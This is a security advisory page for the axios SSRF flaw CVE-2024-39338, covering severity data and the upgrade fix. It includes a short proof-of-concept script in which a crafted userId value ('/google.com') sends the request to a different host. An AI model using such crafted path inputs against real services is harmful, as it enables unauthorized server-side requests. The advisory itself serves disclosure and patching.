Server-side Request Forgery (SSRF) Affecting org.webjars.npm:axios package, versions [,1.7.4)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.08% (38th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGWEBJARSNPM-7675622
  • published11 Aug 2024
  • disclosed24 Jun 2024
  • creditjeffhacks

Introduced: 24 Jun 2024

CVE-2024-39338  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

Upgrade org.webjars.npm:axios to version 1.7.4 or higher.

Overview

org.webjars.npm:axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.

PoC


const axios = require('axios');

this.axios = axios.create({
  baseURL: 'https://userapi.example.com',
});

//userId = '12345';
userId = '/google.com'

this.axios.get(`/${userId}`).then(function (response) {
  console.log(`config.baseURL:  ${response.config.baseURL}`);
  console.log(`config.method:   ${response.config.method}`);
  console.log(`config.url:      ${response.config.url}`);
  console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});

Output:

config.baseURL:  https://userapi.example.com
config.method:   get
config.url:      //google.com
res.responseUrl: http://www.google.com/

CVSS Scores

version 4.0
version 3.1